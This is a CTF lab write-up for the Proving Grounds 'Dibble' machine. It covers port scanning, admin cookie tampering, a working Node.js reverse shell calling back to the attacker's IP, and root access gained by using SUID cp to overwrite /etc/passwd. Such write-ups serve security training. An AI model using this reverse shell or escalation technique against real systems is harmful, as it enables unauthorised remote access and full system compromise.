Proving grounds Practice - Dibble CTF writeup.
NMAP
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.3 (protocol 2.0)
80/tcp open http Apache httpd 2.4.46 ((Fedora))
3000/tcp open http Node.js (Express middleware)
27017/tcp open mongodb MongoDB 4.2.9
21/tcp open ftp vsftpd 3.0.3
- anonymous login
80/tcp open http Apache httpd 2.4.46 ((Fedora))
File and Directory discovery
- http://192.168.213.110/
- http://192.168.213.110/web.config
3000/tcp open http Node.js (Express middleware)
- Register a user.
- Change cookie from default to admin.
- Base64 encode the value and then url encode it.
userLevel=YWRtaW4%3D
- Refresh the page.
- Add new event log.
node js reverse shell
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("sh", []);
var client = new net.Socket();
client.connect(80, "192.168.45.232", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application from crashing
})();
Initial Foothold
naveenj@hackerspace:[09:37]~/proving_grounds/Dibble$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.45.232] from (UNKNOWN) [192.168.201.110] 37530
id
uid=1000(benjamin) gid=1000(benjamin) groups=1000(benjamin)
ls -al
Privilege Escalation
Exfiltrated Information
* 'database' => 'databasename',
* 'username' => 'sqlusername',
* 'password' => 'sqlpassword',
* 'host' => 'localhost',
* 'port' => '3306',
* 'driver' => 'mysql',
SUID
-rwsr-xr-x. 1 root root 156K Apr 23 2020 /usr/bin/cp
SUID Exploitation
- Read /etc/passwd and paste the contents in a file in the local machine.
- Add new sudo user entry to the file.
- Download the updated file to the attacking machine.
- Use
cp
to copy the updated file content to/etc/passwd
. - Switch to the new user which we created using the password.
[benjamin@dibble tmp]$ cp passwd /etc/passwd
cp passwd /etc/passwd
[benjamin@dibble tmp]$ su hacker
su hacker
Password: mypass
[root@dibble tmp]# cd /root
Root Obtained
Reference
- https://www.hackingarticles.in/linux-for-pentester-cp-privilege-escalation/
For more updates and insights, follow me on Twitter: @thevillagehacker.